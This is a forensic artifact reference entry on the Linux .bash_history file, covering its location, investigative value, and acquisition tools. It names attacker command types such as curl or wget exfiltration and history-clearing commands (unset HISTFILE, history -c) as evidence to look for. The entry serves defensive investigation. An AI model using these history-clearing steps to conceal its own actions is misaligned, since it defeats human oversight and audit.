.bash_history (Shell History)

linuxExecution EvidenceDisk Image

Location

/home/<username>/.bash_history and /root/.bash_history

Description

Per-user command history file recording shell commands entered in interactive Bash sessions. May also include .zsh_history, .ash_history, or .python_history depending on the shell and tools used.

Forensic Value

Shell history provides a direct record of attacker commands including reconnaissance (whoami, id, uname -a), lateral movement (ssh, scp), data staging (tar, zip), and exfiltration (curl, wget, scp to external IPs). Sophisticated attackers may clear history (unset HISTFILE, history -c), but partially written history files and timestamps (if HISTTIMEFORMAT was set) often survive. Always check all user accounts including service accounts.

Tools Required

catgrepfindstrings

Acquisition Methods

dd / dc3dd Raw Disk Image

linux — physical

dcfldd Forensic Disk Image

linux — physical

ewfacquire E01 Disk Image

linux — physical

Guymager Full Disk Image

linux — physical

tar Logical Collection

linux — logical